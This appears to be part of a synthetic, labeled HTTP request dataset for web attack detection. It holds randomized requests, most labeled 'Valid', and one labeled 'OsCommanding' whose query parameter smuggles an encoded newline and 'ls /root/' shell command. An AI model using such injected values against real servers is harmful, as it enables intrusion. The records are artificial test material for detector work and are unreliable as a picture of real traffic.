Expect: eenre=cursi6
From: OElnRjE@esgnh6.net
If-Modified-Since: Sun, 24 Jan 10 17:33:25 CET
If-Unmodified-Since: Sun, 08 Jan 06 10:17:12 UTC
If-Match: *
If-None-Match: "n3RSu@sp-myhR1t"
If-Range: "TD6isthNtm7jY26y"
Max-Forwards: 27
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest username="eahAd"
Referer: /2ohiw.fgf
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: cPttr (l5mjDxwVb; c9IegQ; ezamaV.zG)
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 1bNUer/1.3 245.161.192.158, 8.2 www.dolma.gif, ual/3.0 6.114.3.31
Transfer-Encoding: gzip
Upgrade: n2smtz/0.7
Warning: 463 52.135.104.34 "le3vso" 
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35793
Start - Id: 14058
class: Valid
GET /zAWd2ZZJ/o6ehHfi.php3?ALGplM=hrchbeeidN4r&div-aL-gf5qx3D=xxdRXGV&has1=4vll&netea=lno&nsd1onddecri=ew1tanytuE&usnaohbtTN=Nu%5D HTTP/1.0
Host: 196.144.46.95
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nadit-5, loos-sts1d, le-un8e;q=0.6, renke-c;q=0.5
Cache-Control: max-stale=29337
Client-ip: 227.127.75.96
Cookie: 01XWvrda=esm6-Ih-LuR;f5f=nEXen;erarTp=sSptd7E;rxh=ajideElsE8noein;a9e9tnlpiihwa=tedypnnF4;rteiMssGlo=236
Cookie2: $Version="956"
Date: Fri, 06 Mar 09 20:50:16 UTC
ETag: "xJgDFrtgEse3-36SW0OR"
Expect: s1yT=3iet
From: en4oTvbI@e0stef1.cz
If-Modified-Since: Sat, 17 Jun 06 12:17:29 GMT
If-Unmodified-Since: Mon, 11 Dec 06 02:48:12 GMT
If-Match: "INIbM3k@bDQka1vfx"
If-None-Match: "rIVbsWU89WX9ljGTqy"
If-Range: *
Max-Forwards: 204
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM OG9zZXlhOHNlZWxlaXRDNGpydGFFb05sNUUxdHI0YWRUczhuOHVJbGh5
Authorization: Basic TWgyY2lnOmtlZWNjbQ==
Range: 477582-,-394214
Referer: http://www.beCipIh7.net/Egfn.mp3
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/1.3 (X11; U; Unix 1.2; ap-tm; rv:4.3.6) Gecko/25515218
UA-CPU: Sparc
UA-Disp: 091,777,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9552x9727
Via: FTP/1.3 www.aole.png:80, 7.0 www.GaIo.tiff
Transfer-Encoding: gzip
Upgrade: f5esqa/4.6, oCCert/1.3, oteo/4.6, Tlf/5.9, inth/5.5
Warning: 980 www.mem2oh.html "iEatsey" "Sat, 25 Sep 04 08:44:30 CET"
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 0043438224132828242
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14058
Start - Id: 22069
class: Valid
GET /sm/Tonafw8Wodrsxnhgnma/wPkuG_nv88Lnf84E.mdb?brHuee0eysIl=3&eg=yei&iSw3=sbaHusonnLtpf&eO8ebeorsctsea=tMx-K&a1=nsBnnaeqnitrokR HTTP/1.1
Host: www.gtahaissi.cz:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: s6sd-iO3ohrt;q=0.2, shg8tT-owlesup, ml-ta0hgmee;q=0.9, iex-shelepH;q=0.5, m-ese
Cache-Control: max-age=12886
Client-ip: 96.58.109.243
Cookie: lo9nyAr=hskS;hdmrnEnccrTt=kBk5aDA;hyyghEia=dRZAl;w1ZEd1exbetweennull=6662;aonhen=47560
Cookie2: $Version="255"
Date: Tue, 31 Jan 06 24:44:15 CET
ETag: W/"kPLtVKQiUiN1u_DtD8s"
Expect: 100-continue
From: kdhjpy@6iewo7.st
If-Modified-Since: Tue, 06 Jan 04 21:51:45 CET
If-Unmodified-Since: Sun, 18 Nov 07 18:01:36 GMT
If-Match: "b.z7rA7JGPD-oiCkLKIw"
If-None-Match: *
If-Range: Wed, 04 Feb 04 24:37:42 UTC
Max-Forwards: 05
MIME-Version: 4.7
Pragma: tfh4oq=n2h9os
Proxy-Authorization: NTLM b2VMemlwc2hIMndzdGM1dGRlZWFIMTV1ZG85OGxlZm9yaQ==
Authorization: Basic d29JNjpyMDgz
Range: -774
Referer: http://www.1ecout.gov/eted9kt/thtimnm2/tTs0fon/wosrtre/CmhoYdlo.cfm
TE: gzip;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.0 (X11; U; Unix 2.5; im-i0; rv:7.3.7) Gecko/61699788
UA-CPU: StrongARM
UA-Disp: 7235,8490,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4071x1172
Via: FTP/0.1 124.222.30.151
Transfer-Encoding: compress
Upgrade: soic/3.3, o5pho/0.0
Warning: 721 www.eaGi.html "UawfosanHHaojndn" "Wed, 01 Nov 06 18:16:15 GMT"
X-Forwarded-For: 26.127.5.71
X-Serial-Number: 42920569636252963929
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22069
Start - Id: 23902
class: Valid
GET /dphp2e9/cgmhabl/TL-/elvqsbJ5pY70CE/t4cmCyCaHTmzqHoOxR-N/Ythgwmw2/aiWIb8Fa8PH/8inGml9eec85jse.jpeg?tttoerzr=%3Ea%7E&cgittrLosdsc=258&VbinCdeleteC=11nnatrR&ftsNn=blrticeEieNof&druUw=foe&rscshien=tteD4HtaaucaadcoA&tiEerrzUmthouwl=03673&ts5ifrAq7=rDjplL&tl@@7DOW5jylog=lij&5eSaagj4u=w9Mi6&shdgavwraf=passthruew&KtmpPmoBg20lL=18&5Sf6vteuyc5k=5&xsgldts=%5Cas&osas7eAlxnob5a5=1E HTTP/1.1
Host: www.uwrpf6.uk:80
Connection: close
Accept: image/png;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=25
Client-ip: 230.97.196.117
Cookie: po8tnmsySTdeund=mjihtttse
Cookie2: $Version="9"
Date: Thu, 31 Aug 06 22:43:53 UTC
ETag: W/"@z6fB-Sjlo3J0-J"
Expect: 100-continue
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Sat, 02 Aug 08 15:26:39 GMT
If-Unmodified-Since: Sun, 17 Jan 10 18:49:28 CET
If-Match: "XYx2PWSeS2QofeTQUUSz"
If-None-Match: "cA3cbXqiA7Zyg-n2"
If-Range: Wed, 28 Feb 07 19:19:59 GMT
Max-Forwards: 88
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1m1o hniwe=rioiti
Authorization: sa6eo qtbeOxRl=edKtdt
Range: -489
Referer: http://2hh1In.com/nsjg4.asmx
TE: trailers
Trailer: Via
User-Agent: ewq7gca (sG4iSkLe; hce03nJR; hToQkAIEu; 1XMSX176mS; 0Nf@dF)
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7253x9892
Via: 0.5 23.102.47.220, 2.9 221.113.209.231:89484, HTTP/0.0 www.6anscx.js
Transfer-Encoding: euYe
Upgrade: mhT/3.3
Warning: 002 www.5girkg.js "MDcrsoovsn9ab8caPt" 
X-Forwarded-For: 8.218.42.202
X-Serial-Number: 983767381261855
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23902
Start - Id: 29213
class: Valid
GET /SrHCallmochaJUxKafH/tP2KMaS9x/75G@MKIOhot/JzuT/jso1wPtamhhir/esiendeu2st/rrDZKx24ae/yC6pdkzh0dhl/tRGWaaLGq/34aDQbbVaMfxJS/3o/Ruecmc.jpg?teGrfltx=tRWV10zF&doNgotaunsteevn=phgUXkfTd8_1&ubRcsvrlAoxahe=240283&ipenadhrrtnsh=541273723&se=nNatystwhsxair HTTP/1.1
Host: www.etsaner.be:80
Connection: keep-alive
Accept: video/quicktime;q=0.1, audio/*;q=0.0
Accept-Charset: iso-8859-3;q=0.5, windows-1258;q=0.6, shift_jis;q=0.5
Accept-Encoding: 
Accept-Language: muu7npz-UeoOlner;q=0.8
Cache-Control: max-stale=47
Client-ip: 170.251.130.23
Cookie: Fk5ftdropkL=785715843;ns=ncntssstsyLte;xn=mrT;yinohn=f39mg7ybb5C
Cookie2: $Version="3"
Date: Wed, 01 Feb 06 08:09:13 UTC
ETag: W/"etZAFCdpVXdAB-7r1"
Expect: 100-continue
From: aOsere@astiy.biz
If-Modified-Since: Fri, 17 Nov 06 09:19:40 GMT
If-Unmodified-Since: Sun, 22 Apr 07 23:28:13 CET
If-Match: "NMJBf9GJmIH2LLTlJnUj"
If-None-Match: "piF2JHmoI4XRRgADSa"
If-Range: Thu, 01 Dec 05 18:21:31 GMT
Max-Forwards: 8
MIME-Version: 8.2
Pragma: 0=T2
Proxy-Authorization: Digest qop=deeie
Authorization: itarl yaSdre=rhnipu
Range: -4
Referer: /Feftml/Tgh0zg/4atonL/eanDb/ieeaprc.swf
TE: deflate;q=0.9,chunked,trailers
Trailer: User-Agent
User-Agent: uneJsSDit4istp
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 887x0016
Via: 1.2 www.rttT.shtml:03713, FTP/6.2 33.36.55.189
Transfer-Encoding: gzip
Upgrade: itc/2.5
Warning: 332 146.198.222.127 "sgnyiw" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29213
Start - Id: 24473
class: Valid
GET /eybx9_oA4L-yNrcVLGL/ewwohhlisshdthax/bsc0efLnittho1naLl/Oy0sTwI-FT-1VD/o71OAqyzzIjpYR59-/dzwrAko5lexrakuip/asrHltdudneIai4aeeh/acDstdinyoC/sQSYdj/uigedlnllsaaghhuaq/zJ58TS@k9.php?yurCish3as3S=4&ynstni75ha=ooe++fromYghqpo+ewU&y4CvhtpassLFRpgv=e4Ay2lHQW&me=1764&ehn=08&efrsegalelifoda=eG9qwzicE&tpaJ=cneee&ed=aN8er%3Fesss1u&vdnpqnpuudhsuQe=Hest&iEfnWntC=qSw0Q09RJ%40&teie4ei0alTder=o HTTP/1.1
Host: 20.54.234.123
Connection: hiuy8otm
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 105.27.166.52
Cookie: es=5854976;clsAonffint=3m@;otnteEeaia=41
Cookie2: $Version="4"
Date: Sun, 27 May 07 01:59:47 CET
ETag: "H6ltNLfjc2qHi7a_G"
Expect: tiew
From: grtsaui@oahrelty.gov
If-Modified-Since: Fri, 24 Nov 06 10:50:47 GMT
If-Unmodified-Since: Tue, 25 Dec 07 11:51:32 GMT
If-Match: "0EvgF9K@Ig6Ot7G.cQPY"
If-None-Match: *
If-Range: "v4W_@Ex9c9F.4Kx5TtN"
Max-Forwards: 300
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="lcmmeain"
Authorization: Basic TGE5bHpyOmxlRW9TUw==
Range: 10-87
Referer: /L8routc/Sowwscee.msf
TE: chunked;q=0.6,chunked,chunked
Trailer: Cache-Control
User-Agent: kttrtkovCvs
UA-CPU: Sparc
UA-Disp: 200,0703,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 302x1499
Via: 7.5 66.51.62.187
Transfer-Encoding: compress
Upgrade: rdeg/3.6, 4amlzd/2.4, ctceO1/0.6
Warning: 223 214.116.16.145 "vyen6nwlaqe6vllsme" "Thu, 15 Feb 07 01:20:59 CET"
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 280722107
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24473
Start - Id: 17087
class: Valid
GET /t7fqLyLApZ_yop/ONYinclude1boFXSTl_x/pfRjNvpMTmVJtkjlL/nesvdue2PlsmkEratT/f4YL0yQ19i4JHfVLjoc/hjeeW_RSUjW/WphpX/meho/oy1Onn/P4xgpL.php3?ere=cYflreUbTnerLe&dr=eIak&Se4=afTjstZ&h0d5dtEinl59i=n1e&m1tn=2749839&Mhdeletev=ae+%3CmmoAr&2kbjkecsi9n=4709144918&YrJKs=tvP0&libxmlexecPPAQ=il+To5t91eOqv%3A&iznno=833580 HTTP/1.1
Host: www.h1ntbrtn.com
Connection: close
Accept: image/*;q=0.9, audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 142.190.136.132
Cookie: 4oete4taeshn7=eeeffn;UTiGZCyjv=myNa6emcOl1iif;9hvarrau=hy2h2nM16qs
Cookie2: $Version="845"
Date: Wed, 14 Jan 09 06:41:14 CET
ETag: "HA9DQ3Ete4MaHJah"
Expect: apSs=phlfs2
From: mjsOfho@efDme.uk
If-Modified-Since: Tue, 28 Oct 08 24:24:08 GMT
If-Unmodified-Since: Thu, 09 Oct 08 19:33:04 CET
If-Match: "v4L_GHCz9QA58UR"
If-None-Match: *
If-Range: Sat, 29 Oct 05 12:42:08 CET
Max-Forwards: 70
MIME-Version: 3.8
Pragma: Aen='chtec'
Proxy-Authorization: Basic aXZuYTpkYmg4eGM=
Authorization: Digest cnonce="sTQe"
Range: 13-,575-09299
Referer: /mtva/o3yer/yutti/Bhe3dre.css
TE: trailers,gzip;q=0.2,chunked;q=0.8
Trailer: Accept
User-Agent: Mozilla/3.5 (Machintosh; U; Mac OS X 5.6; gg-eA; rv:0.0.9) Gecko/30447532
UA-CPU: PowerPC
UA-Disp: 553,514,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9333x8933
Via: FTP/9.0 16.182.60.135:1
Transfer-Encoding: gzip
Upgrade: uqn7/3.0, adaoI/9.1, aossv/2.2, skt5nb/9.3
Warning: 853 51.149.87.169 "aeHtkSbtamk" "Sun, 01 Jan 06 06:05:57 UTC"
X-Forwarded-For: 232.99.196.70
X-Serial-Number: 17174419292129745419
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17087
Start - Id: 31600
class: Valid
GET /ddl7sehce6rN/df.j/sdo/l72knuC3hBbi0Pvg.png?KM2DgMI73replaceG=2hEika4migada&aaeCitthw=aATc5le8g&hpnsenhfu=eDbkd%40Q&haj=sgess&ssuyoxnai=795399&YHtnullY82M9.=91291 HTTP/1.1
Host: www.NigorfN.fr:80
Connection: close
Accept: application/rtf;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 198.123.188.82
Cookie: a6t=sxoh)oet;al9ysnbm=anfnHbr;dXPiEhuz5m=viatMroh1icatlH
Cookie2: $Version="8"
Date: Mon, 11 Oct 04 09:22:26 GMT
ETag: "yVNzbJcnpSbQm-OQ"
Expect: 100-continue
From: Seenwnj@easRlfj.biz
If-Modified-Since: Wed, 15 Oct 08 21:53:20 GMT
If-Unmodified-Since: Tue, 11 Aug 09 07:53:19 CET
If-Match: "B03bUvGP3AakfqHB1v6"
If-None-Match: "gr_08SnGradVi79"
If-Range: *
Max-Forwards: 8
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest response="FD8ADbEE2Add907cB1Da0CFF05F24cbe"
Authorization: Basic YXJoZ2Y6azV2dA==
Range: -96734,-3593,7159-
Referer: /Yhitptc.sh
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.7 (X11; U; Solaris 9.0; l9-ae; rv:9.8.4) Gecko/88215413
UA-CPU: PowerPC
UA-Disp: 165,316,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3066x402
Via: 6.7 197.164.198.113, 7.3 20.107.19.245
Transfer-Encoding: identity
Upgrade: 13nw/2.3, boittr/0.2, wehuPi/3.1, zbnegf/5.6
Warning: 137 244.132.47.139 "naatanasiuutzeseht" "Tue, 25 Mar 08 09:31:18 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 326800001017
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31600
Start - Id: 34930
class: Valid
PUT /eRJC-AA3HCMdzTE-ZcM.jpeg? HTTP/1.0
Content-Length: 204
Content-Language: zosntsz,7Izbctoz,jnsrri
Content-Encoding: gzip
Content-Location: http://www.ajiis.it/rx5ois/wtYmwxn/npjd/laH6nek.swf
Content-MD5: aGp3dW9FMG9lb2U1djhvdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 06:45:22 CET
Last-Modified: Mon, 17 Aug 09 18:50:05 UTC
Host: 180.124.69.98:66
Connection: close
Accept: */*;q=0.8
Accept-Charset: shift_jis;q=0.1, euc-kr;q=0.5
Accept-Encoding: 
Accept-Language: egCe0tgo-eru, 1tpls-uMean;q=0.1, eCAh-hEJi;q=0.5, sztdE-f8rePnpu
Cache-Control: min-fresh=4357
Client-ip: 216.197.175.99
Cookie: gneilucnrT=ftpI;ryxeh=19869;tkl=ec5;g6e=s5rSf21
Cookie2: $Version="916"
Date: Mon, 31 May 04 11:27:46 GMT
ETag: W/"7y6u5C8mh1f8zYKx8"
Expect: ncCs9wt=rTxL;cide=txRe3
From: sdqf@ierMt4h.ch
If-Modified-Since: Mon, 09 Aug 04 08:58:55 CET
If-Unmodified-Since: Fri, 20 Nov 09 04:04:06 UTC
If-Match: *
If-None-Match: "LgR3ipO3FO_5IyP7"
If-Range: Thu, 20 Oct 05 05:08:35 CET
Max-Forwards: 530
MIME-Version: 6.7
Pragma: e='IOnbige'
Proxy-Authorization: Basic cFdvaGVzZTpldkhoVXI=
Authorization: Digest response="e832F85f5CD9336BB727806B1dA9eFAb"
Range: 26302-,-510,4934-
Referer: /iaiWiez/pshdp/jnhtbnn.exe
TE: gzip;q=0.2,deflate,trailers
Trailer: If-None-Match
User-Agent: oshTIds
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2377x8201
Via: 8.0 242.252.113.47, 8.1 www.4beod.html
Transfer-Encoding: nyodi
Upgrade: yeadoo/9.1, ynen/6.6, egnCa/7.9, uis/6.9
Warning: 265 68.227.212.166:78 "moawtiltates" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

msnBrmSeHhGK=ilt7V&WbRNTxZuyopenw=aljktsaeo2 sscriptobjectb&2wv.oB3q=tztlcl nriE0mr&nma2a=201&ewxmRt=pnhtucsyhmaednato&rtveee2=047&U42ieap1=0sdnhg&gefge71attgu2o=frw$e9Ein&gHM2pIuedes=see&vbsEOtaddee=9e

End - Id: 34930
Start - Id: 36817
class: OsCommanding
GET /em89bZoubrs/twlcesaocsul/uik.-x9Wqf5TgMb@3/tFtXacy/riy.HIxCuy5/HfewlimiyOeTsnis/aQSsj-k-cdOuQehSSm/YonNpldeyn1iorcrnbc/@UT-/_tmN.html?sehdi0tns=%5Cnls++++%2Froot%2F&eRnoesnhszZgro=41990008&8ra=soTlt&XuxALRxo@V=Le&oityb6ei3sestd=xAQaehetlwrasan&wieqfeer=nxw1b%2BiC%5D21ce+n7iid+ HTTP/1.1
Host: www.isA3r6ecI.st
Connection: close
Accept: application/*, audio/*;q=0.4
Accept-Charset: iso-8859-6, gb2312, windows-1257;q=0.0, windows-874
Accept-Encoding: gzip, identity;q=0.6, deflate, deflate
Accept-Language: 0i-ro2hE, TzNgdcmh-ameEn, taejde-x;q=0.6, l0-Tf
Cache-Control: no-store
Client-ip: 72.115.188.239
Cookie: oajB=i78sPVBW
Cookie2: $Version="089"
Date: Fri, 29 Jul 05 17:11:45 CET
ETag: W/"xrA-MA9iPPdOjdqpDkPw"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Tue, 26 Sep 06 11:43:19 GMT
If-Unmodified-Since: Fri, 06 Mar 09 15:37:12 GMT
If-Match: *
If-None-Match: ".QNZp90Uvre6ZFRLy7"
If-Range: *
Max-Forwards: 0501
MIME-Version: 2.5
Pragma: en=h
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: Basic c25pb3JncjppbjFvcnRyVw==
Range: -95
Referer: /fapGieE/D5ieleoe/snNAetoe.css
TE: gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: rNotydeodd/9.9
UA-CPU: Sparc
UA-Color: color32
UA-Pixels: 6983x833
Via: 1.1 70.252.38.238:693, hjEiet/0.6 www.srAp.htm
Transfer-Encoding: identity
Upgrade: er9lae/9.7, tsv3/3.1, ouoda/7.7, rtop/0.7
Warning: 563 140.29.225.75 "tidisFr" "Fri, 10 Sep 04 18:53:07 GMT"
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36817
Start - Id: 16603
class: Valid
GET /0EoI_J.JJbgsoundKH/oe8ayo7.sh?yratydWrsissivo=352&ssawieahoObhie=ncuoeDseelocation&bme=r1p&qh6a=sucopyo&SWvlZzG=128&a1etow6memelize=FmF8o7 HTTP/1.0
Host: www.nxtfaec.it:560
Connection: keep-alive
Accept: application/*;q=0.3, application/*
Accept-Charset: iso-8859-1, koi8-r;q=0.6, cp-950;q=0.5, windows-1251;q=0.3, x-mac-ce
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 115.162.152.91
Cookie: tnhgsnhahh=-Ys77;oo=ois;baa=74114;BZaQ_FLtV=3;tAroa=624;ihnshn=orhhk2Eeuesmaamzo
Cookie2: $Version="845"
Date: Mon, 04 Oct 04 02:55:55 UTC
ETag: "MX6JygOzoRFse2K7NF7"
Expect: lenu=baie;r4Re1
From: dwou@hguthnrf9e.org
If-Modified-Since: Fri, 18 Aug 06 01:53:32 UTC
If-Unmodified-Since: Tue, 19 Apr 05 18:37:30 CET
If-Match: *
If-None-Match: "89KINCCt.sROsbch7"
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest qop=ensne
Authorization: Digest realm
Range: -508053,86460-25,-68
Referer: http://www.Enoesg.biz/ehses/6jtal.swf
TE: trailers,gzip;q=0.4
Trailer: Connection
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 4.0; re-rf; rv:0.1.7) Gecko/83378792
UA-CPU: StrongARM
UA-Disp: 049,0120,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1536x5641
Via: FTP/2.8 www.Nirueo.png
Transfer-Encoding: deflate
Upgrade: Nca/5.9, s4h/1.3
Warning: 105 www.Ia3bwst.html "meseeoOE" 
X-Forwarded-For: 155.254.22.166
X-Serial-Number: 4070028617537255
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16603
Start - Id: 6079
class: Valid
PUT /9sjiC/nieviu5/nN/GwhgcEucypCdl/twarq0uztiu/.3kpasswd.cgi? HTTP/1.0
Content-Length: 65
Content-Language: owmwr
Content-Encoding: deflate
Content-Location: /asseotrz.nsf
Content-MD5: MXVpNGhlcjNyaHMwcnRFeg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Nov 04 10:34:01 UTC
Last-Modified: Fri, 21 Jan 05 01:22:26 UTC
Host: www.eia6lfoe.gov:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: euc-cn;q=0.3
Accept-Encoding: gzip, identity;q=0.6, compress;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 221.255.168.207
Cookie: BdklocationLjmh=6;bimsa=mendAeepusttz?;voarsan=nwttmpyromochael3scriptec1n;9N1IQ=nwoihnrl;oSe3=78067030
Cookie2: $Version="3"
Date: Tue, 11 Oct 05 16:43:45 GMT
ETag: W/"NE3aUauoXGYsn5j1u"
Expect: hoe5r
From: etncdt0y@seyoalsi.be
If-Modified-Since: Fri, 29 Jun 07 06:30:11 CET
If-Unmodified-Since: Tue, 21 Feb 06 15:35:02 UTC
If-Match: *
If-None-Match: "CHE1ePhoFn-FVGIs"
If-Range: Thu, 02 Mar 06 17:22:15 CET
Max-Forwards: 0968
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/kgj1ehet/pnldts/rwlseod/iTpt6ia/uotey0if.php
Authorization: Digest uri=/f3geha/hholaaLP.zip
Range: 8100-26
Referer: /etyr/xi74/enhrnH/tn6bowd1.exe
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (X11; U; Linux i386 4.4; fl-me; rv:7.7.0) Gecko/18531675
UA-CPU: x86
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 179x0676
Via: HTTP/1.3 www.VGze.html, 5.2 www.Zie9tec.png
Transfer-Encoding: deflate
Upgrade: asOo/3.7, xilcsc/2.8, h8r/6.5, llsa/6.6
Warning: 872 4.222.14.84:89 "ieaaIaa" "Tue, 06 Dec 05 18:11:53 GMT"
X-Forwarded-For: 65.50.7.154
X-Serial-Number: 172658995199339
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nrtreex=onqN&iWg=vqlm4&Lshbeocf9m=iV3eKdwBTh.&wt5=itqe>msGseasc

End - Id: 6079
Start - Id: 28909
class: Valid
GET /e7onkr2zonetd/4eU7/au0X2N/qAs5EzudGLfv@.asp? HTTP/1.0
Host: 79.43.53.49
Connection: keep-alive
Accept: video/*, image/jpeg;q=0.4
Accept-Charset: utf-8;q=0.5, isiri-3342;q=0.2, iso-8859-6
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=2699
Client-ip: 161.253.198.56
Cookie: wq2L2F=7;9dnl@K-3=he7rdrIswefhtairTt;mDSuchoo=aytesies;IuWK_=odshhtl4niI2ahhe1e;a0ined=n@uaiex
Cookie2: $Version="054"
Date: Sat, 14 Jul 07 09:35:26 UTC
ETag: "upIPYUxM-5UsVQs1E87"
Expect: dI5tusfg
From: em2nped@eail.de
If-Modified-Since: Mon, 16 Feb 09 11:48:59 GMT
If-Unmodified-Since: Mon, 28 Feb 05 04:47:46 CET
If-Match: "MYz9cdagIEaJTRT7_YTu"
If-None-Match: "sVlfOlPp6h@loBIV"
If-Range: Sat, 27 Sep 08 05:40:16 GMT
Max-Forwards: 29
MIME-Version: 9.1
Pragma: scOf='tC'
Proxy-Authorization: Digest uri=/qjEaKd.asp
Authorization: Digest nonce
Range: 492-,-067,215329-8229
Referer: /FouWiqtd/5mdo/npsl.htm
TE: gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: rPiarorieueneYuslNF
UA-CPU: StrongARM
UA-Disp: 6808,9425,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 218x9813
Via: HTTP/0.2 www.elee.css:51
Transfer-Encoding: Thrv; ozosyag=ws1wtett
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 209 www.lust7.js:12042 "fiu51is" 
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 2568531119908025423
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28909
Start - Id: 34998
class: Valid
PUT /GE/S@exxp_PXtyTinacat/swOm59b4/lkjLpy_vE7W./d_.tiff? HTTP/1.0
Content-Length: 104
Content-Language: rjfa,lslZHs1f,a8cX6o
Content-Encoding: deflate
Content-Location: /nsperwmi/nbeb/esfI.ace
Content-MD5: c2hhZWk3YXRadWUzMnQycw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Jun 04 07:46:58 UTC
Last-Modified: Sat, 22 Sep 07 13:11:51 GMT
Host: 184.136.175.218
Connection: jvyoA0
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 221.151.35.250
Cookie: tanmorwsexcjEn=5;ihcztel=8072;og=8066;6RzdivS-9P=7xhcr;mqnntafqbin=1cH1lbszU;if56tte=2614
Cookie2: $Version="235"
Date: Fri, 27 Oct 06 22:42:30 GMT
ETag: "qIjJFkr0VMW6YYooyzM"
Expect: 100-continue
If-Modified-Since: Thu, 06 May 04 17:03:22 GMT
If-Unmodified-Since: Tue, 27 Mar 07 06:41:25 GMT
If-Match: *
If-None-Match: "jGHZev@roNQpc9e@47"
If-Range: Sun, 14 May 06 24:37:08 GMT
Max-Forwards: 820
Pragma: no-cache
Authorization: Digest uri=/oeijnoom/gxarbi7n/knalnxl/euoese.mdb
Range: 98-
Referer: /lhya/ueezreth/thioen5/elMt6Oeh.mpeg
TE: deflate;q=0.6,chunked
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 5.3; me-ss; rv:3.8.6) Gecko/39753620
UA-CPU: MIPS
UA-Disp: 5254,8319,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3778x0485
Via: 4.4 25.49.150.114, 8.4 www.w2RNrs.tiff, 0.3 www.osaon.jpg:860
Transfer-Encoding: identity
Upgrade: 6eanj/6.8, HH2n/1.0, dmi/6.2, ixeo/8.4
X-Forwarded-For: 151.22.66.165
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

